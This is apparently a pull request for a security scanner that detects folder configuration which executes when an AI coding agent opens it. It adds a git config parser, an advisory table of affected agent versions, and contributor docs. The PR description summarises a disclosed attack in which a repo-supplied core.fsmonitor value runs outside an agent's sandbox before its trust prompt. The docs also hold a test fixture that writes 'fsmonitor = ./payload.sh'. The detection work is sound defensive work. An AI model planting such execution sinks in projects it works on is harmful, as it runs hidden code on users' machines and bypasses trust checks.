+      '.git/hooks/',
+      '.vscode/tasks.json',
+      '.devcontainer/',
+      '.envrc',
+      'repository-scoped agent hook config',
+    ],
+    summary: {
+      total: findings.length,
+      bySeverity: counts,
+      verdict: findings.length === 0 ? 'no-sinks-found' : 'sinks-found',
+    },
+    findings: findings.map((f) => ({
+      rule: f.rule,
+      severity: f.severity,
+      confidence: f.confidence,
+      title: f.title,
+      description: f.description,
+      file: path.relative(rootPath, f.file) || path.basename(f.file),
+      line: f.line,
+      matched: f.matched,
+      cwe: f.cwe,
+      owasp: f.owasp,
+      fix: f.fix,
+      evidenceLevel: f.evidenceLevel,
+    })),
+  };
+}
+
+function renderHuman(rootPath, findings) {
+  const out = process.stdout;
+
+  out.write(`\n${chalk.bold('Workspace trust')} ${chalk.gray(rootPath)}\n\n`);
+
+  if (findings.length === 0) {
+    out.write(`${chalk.green('✓')} No execution sinks found.\n\n`);
+    out.write(
+      `${chalk.gray('  Checked: .git/config, .git/hooks, .vscode/tasks.json, .devcontainer, .envrc,')}\n` +
+        `${chalk.gray('  and repository-scoped agent hook config.')}\n\n`
+    );
+    // Saying what was not checked is the difference between a useful pre-flight
+    // and false assurance. This command reads configuration; it has not looked
+    // at a single line of source.
+    out.write(
+      `${chalk.gray('  This checks configuration that runs on open. It does not scan source code —')}\n` +
+        `${chalk.gray('  run `ship-safe scan` for that.')}\n\n`
+    );
+    return;
+  }
+
+  for (const finding of findings) {
+    const color = SEVERITY_COLOR[finding.severity] ?? chalk.white;
+    const where = path.relative(rootPath, finding.file) || path.basename(finding.file);
+
+    out.write(`${color(`[${finding.severity.toUpperCase()}]`)} ${chalk.bold(finding.title)}\n`);
+    out.write(`  ${chalk.gray(`${where}:${finding.line}`)}  ${chalk.gray(finding.rule)}\n\n`);
+    out.write(`  ${wrap(finding.description)}\n\n`);
+    if (finding.matched) out.write(`  ${chalk.bold('Found:')} ${finding.matched}\n\n`);
+    if (finding.fix) out.write(`  ${chalk.bold('Fix:')} ${wrap(finding.fix, 8)}\n\n`);
+  }
+
+  const critical = findings.filter((f) => f.severity === 'critical').length;
+  const summary = `${findings.length} execution ${findings.length === 1 ? 'sink' : 'sinks'} found`;
+
+  out.write(`${chalk.bold(critical > 0 ? chalk.red(summary) : summary)}\n`);
+  out.write(
+    `${chalk.gray('Do not open this folder with a coding agent or editor until these are resolved.')}\n\n`
+  );
+}
+
+/** Wrap prose to a readable width, indenting continuation lines. */
+function wrap(text, indent = 2) {
+  const width = 76 - indent;
+  const pad = ' '.repeat(indent);
+  const words = String(text).split(/\s+/);
+  const lines = [];
+  let line = '';
+
+  for (const word of words) {
+    if (line.length + word.length + 1 > width) {
+      lines.push(line);
+      line = word;
+    } else {
+      line = line ? `${line} ${word}` : word;
+    }
+  }
+  if (line) lines.push(line);
+
+  return lines.join(`\n${pad}`);
+}
+
+function fail(json, message, rootPath) {
+  if (json) {
+    process.stdout.write(
+      `${JSON.stringify({ version: 1, command: 'trust', path: rootPath, error: message }, null, 2)}\n`
+    );
+  } else {
+    process.stderr.write(`${chalk.red('Error:')} ${message}\n`);
+  }
+  process.exitCode = 2;
+  return null;
+}
+
+export default trustCommand;

--- a/cli/data/agent-advisories.json
+++ b/cli/data/agent-advisories.json
@@ -1,0 +1,96 @@
+{
+  "schemaVersion": 1,
+  "tableVersion": "2026.09.07",
+  "recordedAt": "2026-09-07",
+  "note": "Maps installed agent versions to execution sinks they are documented to invoke. Sourced from advisories and disclosure writeups only, never from vendor marketing or release-note phrasing. This table lags disclosure by design: an agent absent from it is not known to be safe, only undocumented here. Updating it is a normal reviewable pull request.",
+  "entries": [
+    {
+      "id": "goose-fsmonitor",
+      "agent": "goose",
+      "displayName": "Goose",
+      "binaries": ["goose"],
+      "sinks": ["WORKSPACE_GIT_FSMONITOR_EXEC"],
+      "affected": { "lt": "1.44.0" },
+      "patchedIn": "1.44.0",
+      "cve": "CVE-2026-72718",
+      "source": "https://www.manifold.security/blog/ai-coding-agents-git-hijack",
+      "recordedAt": "2026-09-05"
+    },
+    {
+      "id": "codex-cli-fsmonitor",
+      "agent": "codex",
+      "displayName": "Codex CLI",
+      "binaries": ["codex"],
+      "sinks": ["WORKSPACE_GIT_FSMONITOR_EXEC"],
+      "affected": { "gte": "0.102.0", "lte": "0.130.0" },
+      "patchedIn": "0.131.0",
+      "cve": "CVE-2026-19592",
+      "source": "https://www.manifold.security/blog/ai-coding-agents-git-hijack",
+      "recordedAt": "2026-09-05"
+    },
+    {
+      "id": "claude-code-fsmonitor",
+      "agent": "claude-code",
+      "displayName": "Claude Code",
+      "binaries": ["claude"],
+      "sinks": ["WORKSPACE_GIT_FSMONITOR_EXEC"],
+      "affected": { "lt": "2.1.196" },
+      "patchedIn": "2.1.196",
+      "cve": null,
+      "source": "https://www.manifold.security/blog/ai-coding-agents-git-hijack",
+      "recordedAt": "2026-09-05",
+      "notes": "A second sink in the review path was still open at publication and is not documented in enough detail to model. A version at or above 2.1.196 is not covered by this entry and is not thereby established as safe."
+    },
+    {
+      "id": "hermes-agent-fsmonitor",
+      "agent": "hermes",
+      "displayName": "Hermes Agent",
+      "binaries": ["hermes"],
+      "sinks": ["WORKSPACE_GIT_FSMONITOR_EXEC"],
+      "affected": { "exact": ["0.18.2", "0.21.0"] },
+      "patchedIn": null,
+      "cve": "CVE-2026-71963",
+      "source": "https://www.manifold.security/blog/ai-coding-agents-git-hijack",
+      "recordedAt": "2026-09-05",
+      "notes": "Unpatched at publication. 0.21.0 is the release Ship Safe pins as its own coverage baseline; the pin is for reproducibility, not safety."
+    },
+    {
+      "id": "qwen-code-fsmonitor",
+      "agent": "qwen-code",
+      "displayName": "Qwen Code",
+      "binaries": ["qwen", "qwen-code"],
+      "sinks": ["WORKSPACE_GIT_FSMONITOR_EXEC"],
+      "affected": { "exact": ["0.19.6", "0.22.3"] },
+      "patchedIn": null,
+      "cve": null,
+      "source": "https://www.manifold.security/blog/ai-coding-agents-git-hijack",
+      "recordedAt": "2026-09-05",
+      "notes": "Unpatched at publication. Only the two versions named in the writeup are recorded; the surrounding range was not tested and is not claimed."
+    },
+    {
+      "id": "grok-build-fsmonitor",
+      "agent": "grok-build",
+      "displayName": "Grok Build",
+      "binaries": ["grok", "grok-build"],
+      "sinks": ["WORKSPACE_GIT_FSMONITOR_EXEC"],
+      "affected": { "exact": ["0.2.93", "1.0.13"] },
+      "patchedIn": null,
+      "cve": null,
+      "source": "https://www.manifold.security/blog/ai-coding-agents-git-hijack",
+      "recordedAt": "2026-09-05",
+      "notes": "Unpatched at publication. Only the two versions named in the writeup are recorded."
+    },
+    {
+      "id": "cursor-agent-hook-config",
+      "agent": "cursor",
+      "displayName": "Cursor",
+      "binaries": ["cursor"],
+      "sinks": ["WORKSPACE_AGENT_HOOK_CONFIG"],
+      "affected": { "lt": "3.0.0" },
+      "patchedIn": "3.0.0",
+      "cve": "CVE-2026-48124",
+      "source": "https://nvd.nist.gov/vuln/detail/CVE-2026-48124",
+      "recordedAt": "2026-09-05"
+    }
+  ]
+}

--- a/cli/utils/agent-advisories.js
+++ b/cli/utils/agent-advisories.js
@@ -1,0 +1,316 @@
+/**
+ * Pinned Agent Advisory Table
+ * ============================
+ *
+ * Answers one narrow question: is a configured execution sink actually
+ * reachable by an agent this machine has installed?
+ *
+ * A sink in `.git/config` is a fact about the repository. Whether it fires is
+ * a fact about the agent that opens it, and those are different claims. Ship
+ * Safe reports the first as `configured` and only promotes it to `reachable`
+ * when a detected, installed version is documented to invoke it — documented
+ * meaning an advisory or a disclosure writeup, never a vendor's release-note
+ * phrasing.
+ *
+ * Three properties keep this from becoming a claim generator:
+ *
+ *   - The table is pinned, versioned, and carries a date. It lags disclosure,
+ *     so `trust` prints how old it is and lets the reader discount it.
+ *   - Version detection is best effort. When a version cannot be determined,
+ *     the finding stays `unresolved`. It never falls through to `reachable`.
+ *   - Absence from the table is not safety. An agent nobody has written up is
+ *     undocumented, not clean, and the vocabulary here says so.
+ *
+ * See docs/adding-a-security-rule.md for the review discipline on edits.
+ */
+
+import fs from 'fs';
+import os from 'os';
+import path from 'path';
+import { execFileSync } from 'child_process';
+import { fileURLToPath } from 'url';
+
+const HERE = path.dirname(fileURLToPath(import.meta.url));
+const TABLE_PATH = path.join(HERE, '..', 'data', 'agent-advisories.json');
+
+/**
+ * Reachability states, ordered from weakest claim to strongest.
+ *
+ *   'configured'  — the sink is in the repository. Says nothing about agents.
+ *   'unresolved'  — an affected agent may be installed but no version was
+ *                   readable, so the question was not answered.
+ *   'reachable'   — a detected installed version is documented to invoke it.
+ */
+export const REACHABILITY = Object.freeze(['configured', 'unresolved', 'reachable']);
+
+/** How long an agent gets to answer `--version` before it is given up on. */
+const VERSION_TIMEOUT_MS = 2000;
+
+let cachedTable = null;
+
+// =============================================================================
+// TABLE
+// =============================================================================
+
+export function loadAdvisoryTable(tablePath = TABLE_PATH) {
+  if (cachedTable && tablePath === TABLE_PATH) return cachedTable;
+
+  let table;
+  try {
+    table = JSON.parse(fs.readFileSync(tablePath, 'utf8'));
+  } catch {
+    // A missing or unparseable table must not fail a scan, and must not
+    // silently behave like an empty one that clears every finding. Callers
+    // read `entries.length === 0` and keep findings at `configured`.
+    return { schemaVersion: 0, tableVersion: 'unavailable', recordedAt: null, entries: [] };
+  }
+
+  if (tablePath === TABLE_PATH) cachedTable = table;
+  return table;
+}
+
+/** Days between the table's recorded date and now, or null if unknown. */
+export function tableAgeDays(table, now = new Date()) {
+  if (!table?.recordedAt) return null;
+  const recorded = new Date(`${table.recordedAt}T00:00:00Z`);
+  if (Number.isNaN(recorded.getTime())) return null;
+  return Math.max(0, Math.floor((now - recorded) / 86_400_000));
+}
+
+// =============================================================================
+// VERSION COMPARISON
+// =============================================================================
+
+/**
+ * Compare two dotted numeric versions.
+ *
+ * Deliberately not semver-complete. The table holds release versions, and a
+ * comparator that guessed at prerelease ordering would let an entry cover more
+ * than the writeup it came from. A version this cannot parse returns null and
+ * the caller reports `unresolved`.
+ */
+export function compareVersions(a, b) {
+  const parse = (v) => {
+    const core = String(v).trim().replace(/^v/, '').split(/[-+]/)[0];
+    if (!/^\d+(\.\d+)*$/.test(core)) return null;
+    return core.split('.').map(Number);
+  };
+
+  const left = parse(a);
+  const right = parse(b);
+  if (!left || !right) return null;
+
+  for (let i = 0; i < Math.max(left.length, right.length); i++) {
+    const diff = (left[i] ?? 0) - (right[i] ?? 0);
+    if (diff !== 0) return diff < 0 ? -1 : 1;
+  }
+  return 0;
+}
+
+/**
+ * Whether a version falls in an entry's affected set.
+ *
+ * Returns null rather than false when the comparison cannot be made, so an
+ * unparseable version is reported as unresolved instead of quietly clearing
+ * the finding.
+ */
+export function isAffected(version, affected) {
+  if (!affected || !version) return null;
+
+  if (Array.isArray(affected.exact)) {
+    // An exact list is exactly what it says. The writeup tested these
+    // versions; the ones around them were not tested and are not claimed.
+    for (const candidate of affected.exact) {
+      const cmp = compareVersions(version, candidate);
+      if (cmp === null) return null;
+      if (cmp === 0) return true;
+    }
+    return false;
+  }
+
+  const checks = [
+    ['lt', -1], ['lte', 0], ['gt', 1], ['gte', 0],
+  ];
+
+  let matched = false;
+  for (const [key] of checks) {
+    if (affected[key] === undefined) continue;
+    const cmp = compareVersions(version, affected[key]);
+    if (cmp === null) return null;
+
+    const ok =
+      (key === 'lt' && cmp < 0) ||
+      (key === 'lte' && cmp <= 0) ||
+      (key === 'gt' && cmp > 0) ||
+      (key === 'gte' && cmp >= 0);
+
+    if (!ok) return false;
+    matched = true;
+  }
+
+  return matched ? true : null;
+}
+
+// =============================================================================
+// LOCAL AGENT DETECTION
+// =============================================================================
+
+/**
+ * Directories that may be searched for an agent binary.
+ *
+ * PATH is filtered rather than trusted. A relative entry, an empty entry
+ * (which POSIX reads as the current directory), or anything inside the folder
+ * being inspected would let the scanned repository supply the binary whose
+ * version we are about to ask for — turning a read-only pre-flight check into
+ * one that executes repository-supplied code. That is precisely the attack
+ * `ship-safe trust` exists to warn about.
+ */
+function searchablePathDirs(excludeRoot) {
+  const raw = String(process.env.PATH ?? '').split(path.delimiter);
+  const exclude = excludeRoot ? path.resolve(excludeRoot) : null;
+
+  return raw.filter((dir) => {
+    if (!dir) return false;
+    if (!path.isAbsolute(dir)) return false;
+
+    const resolved = path.resolve(dir);
+    if (!exclude) return true;
+    return resolved !== exclude && !resolved.startsWith(`${exclude}${path.sep}`);
+  });
+}
+
+/** Absolute path of a binary on PATH, or null. */
+function resolveBinary(name, excludeRoot) {
+  for (const dir of searchablePathDirs(excludeRoot)) {
+    const candidate = path.join(dir, name);
+    try {
+      const stat = fs.statSync(candidate);
+      if (stat.isFile() && (stat.mode & 0o111)) return candidate;
+    } catch { /* next */ }
+  }
+  return null;
+}
+
+/**
+ * Ask an installed agent for its version.
+ *
+ * Never through a shell, never with the scanned folder as cwd, and never a
+ * binary resolved from inside it. This runs a program the user installed, not
+ * one the repository supplied, and the distinction is the whole safety
+ * argument for doing it at all.
+ */
+export function detectAgentVersion(binaryName, { excludeRoot = null } = {}) {
+  const binary = resolveBinary(binaryName, excludeRoot);
+  if (!binary) return null;
+
+  let output;
+  try {
+    output = execFileSync(binary, ['--version'], {
+      timeout: VERSION_TIMEOUT_MS,
+      encoding: 'utf8',
+      stdio: ['ignore', 'pipe', 'ignore'],
+      // Never the folder under inspection: a cwd inside it would let the
+      // repository influence a tool that reads config from its working
+      // directory.
+      cwd: os.tmpdir(),
+      shell: false,
+    });
+  } catch {
+    return null;
+  }
+
+  const match = String(output).match(/\d+(?:\.\d+)+/);
+  return match ? { binary, version: match[0] } : null;
+}
+
+// =============================================================================
+// RESOLUTION
+// =============================================================================
+
+/**
+ * Decide reachability for one rule.
+ *
+ * Returns the state plus the evidence behind it, so a report can say why
+ * rather than only what. `installed` lists the agents actually detected;
+ * `candidates` lists the table entries that cover this rule at all, which is
+ * what makes an `unresolved` result legible.
+ */
+export function resolveReachability(rule, { table = loadAdvisoryTable(), excludeRoot = null, detect = detectAgentVersion } = {}) {
+  const candidates = (table.entries ?? []).filter((e) => (e.sinks ?? []).includes(rule));
+
+  if (candidates.length === 0) {
+    // No advisory covers this sink. That is not evidence of safety, so the
+    // finding stays where it started rather than being cleared.
+    return {
+      state: 'configured',
+      reason: 'No pinned advisory covers this sink, so reachability was not assessed.',
+      candidates: [],
+      installed: [],
+    };
+  }
+
+  const installed = [];
+  let sawAgentWithUnknownVersion = false;
+
+  for (const entry of candidates) {
+    for (const binary of entry.binaries ?? []) {
+      const found = detect(binary, { excludeRoot });
+      if (!found) continue;
+
+      const affected = isAffected(found.version, entry.affected);
+      if (affected === null) {
+        sawAgentWithUnknownVersion = true;
+        continue;
+      }
+
+      installed.push({
+        agent: entry.displayName,
+        version: found.version,
+        affected,
+        cve: entry.cve ?? null,
+        patchedIn: entry.patchedIn ?? null,
+        source: entry.source,
+        entryId: entry.id,
+      });
+    }
+  }
+
+  const hits = installed.filter((i) => i.affected);
+
+  if (hits.length > 0) {
+    const names = hits.map((h) => `${h.agent} ${h.version}${h.cve ? ` (${h.cve})` : ''}`);
+    return {
+      state: 'reachable',
+      reason: `Installed and documented to invoke this sink: ${names.join(', ')}.`,
+      candidates: candidates.map((c) => c.id),
+      installed,
+    };
+  }
+
+  if (sawAgentWithUnknownVersion) {
+    return {
+      state: 'unresolved',
+      reason: 'An agent covered by an advisory is installed but its version could not be read, so reachability is unknown.',
+      candidates: candidates.map((c) => c.id),
+      installed,
+    };
+  }
+
+  if (installed.length > 0) {
+    return {
+      state: 'configured',
+      reason: `Installed agents are outside the affected versions: ${installed.map((i) => `${i.agent} ${i.version}`).join(', ')}. Other agents may still reach this sink.`,
+      candidates: candidates.map((c) => c.id),
+      installed,
+    };
+  }
+
+  return {
+    state: 'unresolved',
+    reason: 'No agent covered by an advisory was detected on this machine. Absence of a local install is not evidence the folder is safe to open elsewhere.',
+    candidates: candidates.map((c) => c.id),
+    installed: [],
+  };
+}
+
+export default { loadAdvisoryTable, resolveReachability, detectAgentVersion, compareVersions, isAffected, tableAgeDays, REACHABILITY };

--- a/cli/utils/git-config.js
+++ b/cli/utils/git-config.js
@@ -1,0 +1,159 @@
+/**
+ * Git config parsing
+ * ==================
+ *
+ * A minimal reader for git's INI-with-subsections config format, written for
+ * detection rather than for round-tripping. It exists because the values that
+ * matter to WorkspaceTrustAgent are execution sinks, and reporting one means
+ * pointing at the exact line a reviewer has to look at.
+ *
+ * What it deliberately does NOT do: resolve includes (`[include]` /
+ * `[includeIf]`), merge system and global scopes, or expand `~`. A detector
+ * that followed includes would start reporting on files outside the scanned
+ * tree, and a detector that merged scopes could not tell the reader whether a
+ * dangerous value arrived with the repository or was already on their machine.
+ * That distinction is the entire point of the workspace-trust rules, so the
+ * parser stays scoped to one file and the caller decides what that file means.
+ *
+ * USAGE:
+ *   const entries = parseGitConfig(source);
+ *   // → [{ section: 'core', subsection: null, key: 'fsmonitor',
+ *   //      value: '.git/hooks/watch', line: 3, raw: 'fsmonitor = ...' }]
+ */
+
+/**
+ * Booleans git accepts, lowercased. A key with no `=` is also true.
+ *
+ * This list is why `core.fsmonitor = true` must never be reported: it selects
+ * git's own built-in FSMonitor daemon and runs no external program. Only a
+ * value that is not a boolean names a command.
+ */
+const BOOLEAN_VALUES = new Set(['true', 'false', 'yes', 'no', 'on', 'off', '1', '0']);
+
+/** Whether a git config value is one of git's boolean spellings. */
+export function isBooleanValue(value) {
+  if (value === null || value === undefined) return true; // bare key means true
+  return BOOLEAN_VALUES.has(String(value).trim().toLowerCase());
+}
+
+/**
+ * Strip an unquoted trailing comment.
+ *
+ * Git treats `#` and `;` as comment introducers outside quotes, so
+ * `fsmonitor = ./watch # fast` has the value `./watch`. Doing this wrong in
+ * either direction is a detection bug: keeping the comment inflates what we
+ * quote back to the user, and stripping inside quotes truncates a real command.
+ */
+function splitValueAndComment(text) {
+  let inQuotes = false;
+  for (let i = 0; i < text.length; i++) {
+    const ch = text[i];
+    if (ch === '\\') { i++; continue; }
+    if (ch === '"') { inQuotes = !inQuotes; continue; }
+    if (!inQuotes && (ch === '#' || ch === ';')) return text.slice(0, i);
+  }
+  return text;
+}
+
+/**
+ * Remove surrounding quotes and resolve the escapes git recognises in values.
+ */
+function unquote(value) {
+  const text = value.trim();
+  if (!text) return '';
+
+  let out = '';
+  let inQuotes = false;
+
+  for (let i = 0; i < text.length; i++) {
+    const ch = text[i];
+    if (ch === '\\') {
+      const next = text[i + 1];
+      if (next === 'n') { out += '\n'; i++; continue; }
+      if (next === 't') { out += '\t'; i++; continue; }
+      if (next === '"' || next === '\\') { out += next; i++; continue; }
+      continue;
+    }
+    if (ch === '"') { inQuotes = !inQuotes; continue; }
+    out += ch;
+  }
+
+  return inQuotes ? out : out.trim();
+}
+
+/**
+ * Parse git config source into flat entries.
+ *
+ * Line numbers are 1-based and point at the line the key was written on, which
+ * for a continued value is where it started. Section headers may carry a
+ * subsection (`[filter "lfs"]`), and git treats section and key names as
+ * case-insensitive while subsection names stay case-sensitive. Entries are
+ * returned lowercased on section and key for that reason.
+ *
+ * @param {string} source raw contents of a git config file
+ * @returns {Array<{section:string, subsection:string|null, key:string,
+ *                  value:string|null, line:number, raw:string}>}
+ */
+export function parseGitConfig(source) {
+  const entries = [];
+  if (typeof source !== 'string' || !source) return entries;
+
+  const lines = source.split(/\r?\n/);
+  let section = null;
+  let subsection = null;
+
+  for (let i = 0; i < lines.length; i++) {
+    let text = lines[i];
+
+    // A value ending in a backslash continues on the next line. Consume the
+    // continuation here so the entry keeps the line number it started on.
+    const startLine = i + 1;
+    while (/\\\s*$/.test(text) && i + 1 < lines.length) {
+      text = text.replace(/\\\s*$/, '') + lines[i + 1];
+      i++;
+    }
+
+    const trimmed = text.trim();
+    if (!trimmed || trimmed.startsWith('#') || trimmed.startsWith(';')) continue;
+
+    const header = trimmed.match(/^\[([A-Za-z0-9._-]+)(?:\s+"((?:[^"\\]|\\.)*)")?\s*\]/);
+    if (header) {
+      section = header[1].toLowerCase();
+      subsection = header[2] === undefined ? null : unquote(`"${header[2]}"`);
+      continue;
+    }
+
+    if (section === null) continue;
+
+    const eq = trimmed.indexOf('=');
+    if (eq === -1) {
+      // Bare key. Git reads this as boolean true.
+      const key = splitValueAndComment(trimmed).trim();
+      if (!/^[A-Za-z0-9._-]+$/.test(key)) continue;
+      entries.push({ section, subsection, key: key.toLowerCase(), value: null, line: startLine, raw: trimmed });
+      continue;
+    }
+
+    const key = trimmed.slice(0, eq).trim();
+    if (!/^[A-Za-z0-9._-]+$/.test(key)) continue;
+    const value = unquote(splitValueAndComment(trimmed.slice(eq + 1)));
+
+    entries.push({ section, subsection, key: key.toLowerCase(), value, line: startLine, raw: trimmed });
+  }
+
+  return entries;
+}
+
+/**
+ * All entries matching a section and key, in file order.
+ *
+ * Git's last-one-wins semantics mean a later duplicate overrides an earlier
+ * one, but a detector wants every occurrence: a config that sets a safe value
+ * and then a dangerous one is exactly the shape worth reporting, and reporting
+ * only the effective value would hide the first line a reviewer should read.
+ */
+export function findEntries(entries, section, key) {
+  const wantSection = String(section).toLowerCase();
+  const wantKey = String(key).toLowerCase();
+  return entries.filter((e) => e.section === wantSection && e.key === wantKey);
+}

--- a/cli/utils/output.js
+++ b/cli/utils/output.js
@@ -244,9 +244,9 @@ export function printBanner(version) {
   console.log(chalk.cyan('╚══════╝╚═╝  ╚═╝╚═╝╚═╝         ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝'));
   console.log();
   if (version) {
-    console.log(chalk.gray(`  v${version} · 29 agents · 80+ attack classes · shipsafe.sh`));
+    console.log(chalk.gray(`  v${version} · 30 agents · 80+ attack classes · shipsafe.sh`));
   } else {
-    console.log(chalk.gray('  29 agents · 80+ attack classes · shipsafe.sh'));
+    console.log(chalk.gray('  30 agents · 80+ attack classes · shipsafe.sh'));
   }
   console.log();
 }

--- a/docs/adding-a-security-rule.md
+++ b/docs/adding-a-security-rule.md
@@ -90,8 +90,24 @@ A rule that fires on healthy repositories is worse than no rule, because it teac
 | `WORKSPACE_GIT_FILTER_PROCESS` | Git LFS `clean` / `smudge` / `process` commands |
 | `WORKSPACE_GIT_HOOKS_PATH` | husky and lefthook, which redirect hooks by design |
 | `WORKSPACE_GIT_HOOK_PRESENT` | git's shipped `*.sample` hooks |
+| `WORKSPACE_TASK_AUTORUN` | any task without `runOptions.runOn: folderOpen` |
+| `WORKSPACE_ENVRC_EXEC` | variable assignments and direnv stdlib helpers such as `layout node` |
+| `WORKSPACE_AGENT_HOOK_CONFIG` | Ship Safe's own `ship-safe guard` hook, and forms `CLAUDE_HOOK_*` already reports |
 
-Exempt by the specific evidence, not by the label. The filter exemption matches the LFS command, not the filter named `lfs`, so a hostile entry cannot claim the name and inherit the exemption. The husky exemption requires an installed marker file, not just a `.husky` directory.
+Exempt by the specific evidence, not by the label. The filter exemption matches the LFS command, not the filter named `lfs`, so a hostile entry cannot claim the name and inherit the exemption. The husky exemption requires an installed marker file, not just a `.husky` directory. The Ship Safe hook exemption matches the invocation, so a repository cannot opt itself out by writing the scanner's name into a comment.
+
+### Do not report the same line twice
+
+`WORKSPACE_AGENT_HOOK_CONFIG` and `AgentConfigScanner`'s `CLAUDE_HOOK_SHELL_CMD` both read `.claude/settings.json`. Two findings for one hook is noise, and the reader has no way to tell whether they are looking at one problem or two. The newer rule suppresses the forms the existing one already reports and covers the rest of the shape.
+
+When a rule overlaps an existing one, decide which owns the overlap and make the other silent there. Do it with an explicit check that names the other rule, so the next person can find both ends of the arrangement.
+
+### Severity should track what the victim can notice or reach
+
+Two of these rules carry a severity split rather than a fixed level, and both splits are about blast radius rather than about how clever the attack is:
+
+- `WORKSPACE_TASK_AUTORUN` is high when the task reveals a terminal panel and critical when `presentation.reveal` is `silent`. A visible panel is a real chance to notice and close the window.
+- `WORKSPACE_DEVCONTAINER_INIT` is high for `initializeCommand`, which runs on the host before the container exists, and medium for every other lifecycle hook, which runs inside it.
 
 ## What to Avoid
 

--- a/docs/adding-a-security-rule.md
+++ b/docs/adding-a-security-rule.md
@@ -112,3 +112,31 @@ Two of these rules carry a severity split rather than a fixed level, and both sp
 ## What to Avoid
 
 Avoid rules that flag common strings without strong context, require network access for core scanning, or create findings that only say "review this." Ship Safe should help developers decide what to fix next.
+
+## Updating the Pinned Advisory Table
+
+`cli/data/agent-advisories.json` maps installed agent versions to the execution sinks they are documented to invoke. It is what promotes a `WORKSPACE_*` finding from `configured` to `reachable`, so an edit to it changes what Ship Safe claims about a user's machine. Treat it like the Hermes baseline: a normal reviewable pull request, never a silent expansion.
+
+Every entry states where the claim came from and when:
+
+```json
+{
+  "id": "goose-fsmonitor",
+  "binaries": ["goose"],
+  "sinks": ["WORKSPACE_GIT_FSMONITOR_EXEC"],
+  "affected": { "lt": "1.44.0" },
+  "patchedIn": "1.44.0",
+  "cve": "CVE-2026-72718",
+  "source": "https://www.manifold.security/blog/ai-coding-agents-git-hijack",
+  "recordedAt": "2026-09-05"
+}
+```
+
+Rules for an edit:
+
+- **Source it from an advisory or a disclosure writeup**, never from a vendor's release notes or marketing page. "Improved security of git integration" is not a documented sink.
+- **Record only what was tested.** `affected` takes `{ lt }`, `{ gte, lte }`, or `{ exact: [...] }`. When a writeup names two versions, use `exact` with those two. The versions between them were not tested, and a range would claim them.
+- **A patched version is not a safe version.** It is outside *this entry*. The resolver says so explicitly rather than reporting the folder as clean.
+- **Absence is not safety.** An agent nobody has written up is undocumented. There is no entry that means "checked and fine".
+
+Three properties are enforced by `cli/__tests__/agent-advisories.test.js` and should stay that way: an unreadable version resolves to `unresolved` and never to `reachable`; a table that fails to load behaves like one that assessed nothing rather than one that cleared everything; and version detection never resolves a binary from inside the folder being inspected, because running a repository-supplied executable is the attack `ship-safe trust` exists to warn about.

--- a/docs/adding-a-security-rule.md
+++ b/docs/adding-a-security-rule.md
@@ -58,6 +58,41 @@ npm test
 node cli/bin/ship-safe.js scan . --no-ai
 ```
 
+### Never commit a fixture that attacks the person running the tests
+
+Some rules describe configuration that executes. `WORKSPACE_GIT_FSMONITOR_EXEC` is the clearest case: a `.git/config` containing `core.fsmonitor = <command>` runs that command on the next git operation in that directory. Committing one as a fixture would mean any contributor, any editor indexing the tree, and CI itself could execute it. `npm test` alone runs git plenty of times.
+
+Build these fixtures at run time instead. Create a temp directory, write the files into it, scan it, and remove it in a `finally` block:
+
+```js
+const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'shipsafe-rule-'));
+try {
+  fs.mkdirSync(path.join(dir, '.git'), { recursive: true });
+  fs.writeFileSync(path.join(dir, '.git', 'config'), '[core]\n\tfsmonitor = ./payload.sh\n');
+  const findings = await new MyAgent().analyze({ rootPath: dir, files: [], recon: {}, options: {} });
+  assert.ok(findings.some((f) => f.rule === 'MY_RULE'));
+} finally {
+  fs.rmSync(dir, { recursive: true, force: true });
+}
+```
+
+If a fixture genuinely has to exist on disk, store the directory as `dot-git` and rename it into place inside the temp tree. A directory literally named `.git` in the repository is never acceptable, because git will find it.
+
+See `cli/__tests__/workspace-trust-git.test.js` for the full pattern.
+
+### Pair every rule with the benign form it must not flag
+
+A rule that fires on healthy repositories is worse than no rule, because it teaches people to skip the whole category. Write the safe fixture first when the benign form is common:
+
+| Rule | Benign form that must stay silent |
+|------|-----------------------------------|
+| `WORKSPACE_GIT_FSMONITOR_EXEC` | `core.fsmonitor = true`, which selects git's built-in daemon |
+| `WORKSPACE_GIT_FILTER_PROCESS` | Git LFS `clean` / `smudge` / `process` commands |
+| `WORKSPACE_GIT_HOOKS_PATH` | husky and lefthook, which redirect hooks by design |
+| `WORKSPACE_GIT_HOOK_PRESENT` | git's shipped `*.sample` hooks |
+
+Exempt by the specific evidence, not by the label. The filter exemption matches the LFS command, not the filter named `lfs`, so a hostile entry cannot claim the name and inherit the exemption. The husky exemption requires an installed marker file, not just a `.husky` directory.
+
 ## What to Avoid
 
 Avoid rules that flag common strings without strong context, require network access for core scanning, or create findings that only say "review this." Ship Safe should help developers decide what to fix next.


### PR DESCRIPTION
The flagship 11.0 workstream: detect configuration a folder carries that executes when an agent opens it, before any trust dialog.

Closes #203, closes #204.

## Why this and not A2A

The v11 research moved A2A to workstream 2 and put this first. Manifold Security's GitSpawn (1 September) showed a repo-supplied `.git/config` `core.fsmonitor` value executing at agent startup, outside the sandbox and before the trust prompt. Seven agents were affected, four unpatched at publication — including Hermes 0.21.0 under CVE-2026-71963, which is the release Ship Safe pins as its own coverage baseline. Ship Safe had zero coverage of the whole category.

The delivery constraint is what makes it a detector rather than a vendor patch note. `git clone`, `fetch`, and `pull` never transmit a hostile `.git/config`. This arrives the way take-home projects and client handoffs actually arrive: a zip, a shared drive, a synced folder.

## Nine rules

| Rule | Sink | Severity |
|---|---|---|
| `WORKSPACE_GIT_FSMONITOR_EXEC` | `core.fsmonitor` set to a command | critical |
| `WORKSPACE_GIT_HOOKS_PATH` | `core.hooksPath` inside the repo tree | critical |
| `WORKSPACE_GIT_ATTR_TREE` | `attr.tree` on repo-controlled attributes | high |
| `WORKSPACE_GIT_FILTER_PROCESS` | `filter.*.process` / `.clean` / `.smudge` | high |
| `WORKSPACE_GIT_HOOK_PRESENT` | executable non-sample files in `.git/hooks/` | high |
| `WORKSPACE_TASK_AUTORUN` | `tasks.json` `runOn: folderOpen` | high, critical when silent |
| `WORKSPACE_DEVCONTAINER_INIT` | `initializeCommand` and lifecycle hooks | high host-side, medium in-container |
| `WORKSPACE_ENVRC_EXEC` | `.envrc` command execution | medium |
| `WORKSPACE_AGENT_HOOK_CONFIG` | repo-scoped agent hook config | critical |

